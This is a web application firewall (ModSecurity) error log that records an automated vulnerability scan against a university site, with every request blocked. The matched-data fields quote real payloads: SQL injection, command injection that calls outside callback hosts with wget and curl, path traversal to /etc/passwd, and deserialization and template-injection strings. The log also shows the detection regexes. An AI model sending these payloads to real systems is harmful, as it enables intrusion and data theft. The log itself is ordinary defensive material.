[Tue Aug 29 11:32:47.593691 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:file: ;echo CVE-2023-23333|rev\\x00.zip"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO1078Co-f0AAARH7KUAAAAM"]
[Tue Aug 29 11:32:49.394752 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within XML: \\x0a\\x0a\\x0a\\x0a\\x0arO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\\x0agetUnsavedChanges\\x0arO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubm..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO108cCo-f0AAARR23MAAAAF"]
[Tue Aug 29 11:32:49.442809 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?> < found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22ISO-8859-1\\x22?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\\x22what\\x22;O:11:\\x22Pdp\\x5cUri\\x5cUrl\\x22:1:{S:17:\\x22\\x5c00Pdp\\x5c5CUri\\x5c5CUrl\\x5c00host\\x22;O:21:\\x22League\\x5cFlysystem\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/adxmlrpc.php"] [unique_id "ZO108cCo-f0AAARR23UAAAAF"]
[Tue Aug 29 11:32:51.464152 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:id: -1 union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/ajax/avatar.php"] [unique_id "ZO1088Co-f0AAAN9sY8AAAAJ"]
[Tue Aug 29 11:32:59.299306 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/glpi/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAAPDoJgAAAAP"]
[Tue Aug 29 11:32:59.338843 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARTEKUAAAAG"]
[Tue Aug 29 11:32:59.717192 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:token: `wget http:/cjmn8l5jmimk2adbbnlgqnernd11uxzrt.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/storfs-asup"] [unique_id "ZO10@8Co-f0AAARR244AAAAF"]
[Tue Aug 29 11:33:05.765193 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')\\x0a@ found within ARGS:value: @GrabConfig(disableChecksums=true)\\x0a@GrabResolver(name='test', root='http://aaa')\\x0a@Grab(group='package', module='vulntest', version='1')\\x0aimport Payload;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"] [unique_id "ZO11AcCo-f0AAAQKOhcAAAAs"]
[Tue Aug 29 11:33:09.410357 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- - found within ARGS:username: ' OR 1=1 -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11BcCo-f0AAARTEKkAAAAG"]
[Tue Aug 29 11:33:09.924398 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/app"] [unique_id "ZO11BcCo-f0AAAQKOiEAAAAs"]
[Tue Aug 29 11:33:10.340607 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/app"] [unique_id "ZO11BsCo-f0AAARA7dkAAAAA"]
[Tue Aug 29 11:33:11.304749 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO11B8Co-f0AAARA7d0AAAAA"]
[Tue Aug 29 11:33:12.518706 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:docid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:docid: 1 AND (SELECT 6288 FROM (SELECT(SLEEP(6)))HRaz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11CMCo-f0AAARTELgAAAAG"]
[Tue Aug 29 11:33:12.634998 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgg7s4kfy1m8kfz.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgg7s4kfy1m8kfz.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARNk88AAAAS"]
[Tue Aug 29 11:33:12.783817 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgajefwyr98sgax.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgajefwyr98sgax.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARQ360AAAAB"]
[Tue Aug 29 11:33:12.823422 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:hostname: `id`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/controller/ping.php"] [unique_id "ZO11CMCo-f0AAARQ368AAAAB"]
[Tue Aug 29 11:33:13.317368 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlg1wkw668sdfpeu.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg1wkw668sdfpeu.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAAQKOioAAAAs"]
[Tue Aug 29 11:33:13.356008 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgmz6go9drawgab.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgmz6go9drawgab.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARNk9YAAAAS"]
[Tue Aug 29 11:33:14.390329 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:stagingTaskData. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x22>\\x0a  < found within ARGS:stagingTaskData: <SOAP-ENV:Envelope xmlns:xsi=\\x22http://www.w3.org/2001/XMLSchema-instance\\x22 xmlns:xsd=\\x22http://www.w3.org/2001/XMLSchema\\x22 xmlns:SOAP-ENC=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22 xmlns:SOAP-ENV=\\x22http://schemas.xmlsoap.org/soap/envelope/\\x22 xmlns:clr=\\x22http://schemas.microsoft.com/soap/encoding/clr/1.0\\x22 SOAP-ENV:encodingStyle=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22>\\x0a  <SOAP-ENV:Body>\\x0a    <a1:WindowsIden..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"] [unique_id "ZO11CsCo-f0AAAQKOi0AAAAs"]
[Tue Aug 29 11:33:14.459846 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:inUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:inUrl: file///etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wavemaker/studioService.download"] [unique_id "ZO11CsCo-f0AAARdiHUAAAAK"]
[Tue Aug 29 11:33:14.565139 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/compliancepolicyelements.inc.php"] [unique_id "ZO11CsCo-f0AAARdiHYAAAAK"]
[Tue Aug 29 11:33:17.987165 2023] [:error] [pid 1126] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:jk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:jk: pyimport os;os.system(\\x22curl cjmn8l5jmimk2adbbnlg4t5f9m5xsgqjn.oast.site\\x22);f=function f2(){};"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/flash/addcrypted2"] [unique_id "ZO11DcCo-f0AAARm7z4AAAAO"]
[Tue Aug 29 11:33:18.771248 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:macAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:macAddress: 112233445566;wget http:/cjmn8l5jmimk2adbbnlgo7nmozue1pae3.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/boardDataWW.php"] [unique_id "ZO11DsCo-f0AAAQKOj4AAAAs"]
[Tue Aug 29 11:33:19.020029 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: //..//..//..//..//..//../ found within ARGS:target: l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/elfinder/php/connector.minimal.php"] [unique_id "ZO11D8Co-f0AAARv7PAAAAAY"]
[Tue Aug 29 11:33:19.059257 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:id: 12 AND (SELECT 5023 FROM (SELECT(SLEEP(6)))Fvrh)-- VoFu"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11D8Co-f0AAARA7fAAAAAA"]
[Tue Aug 29 11:33:19.299581 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../..// found within ARGS:fname: ../../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARpgxIAAAAU"]
[Tue Aug 29 11:33:19.317346 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ip. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../../ found within ARGS:ip: 127.0.0.1|cat /etc/passwd>../../2UdxkKVwy9OqHqptk3OiMdsqI1X.txt"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/manager/radius/server_ping.php"] [unique_id "ZO11D8Co-f0AAARA7fIAAAAA"]
[Tue Aug 29 11:33:19.362993 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../// found within ARGS:fname: ../../../../../../..///config/MPXnode/www/appConfig/userDB.json"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARTENcAAAAG"]
[Tue Aug 29 11:33:21.303387 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:order: id;select(md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/api/experimental/patternfile"] [unique_id "ZO11EcCo-f0AAARnmIkAAAAR"]
[Tue Aug 29 11:33:22.301633 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:document: this.constructor.constructor(\\x22return process\\x22)().mainModule.require(\\x22child_process\\x22).execSync(\\x22curl cjmn8l5jmimk2adbbnlgyy5ikyjjpbo6f.oast.site\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO11EsCo-f0AAARzXwwAAAAd"]
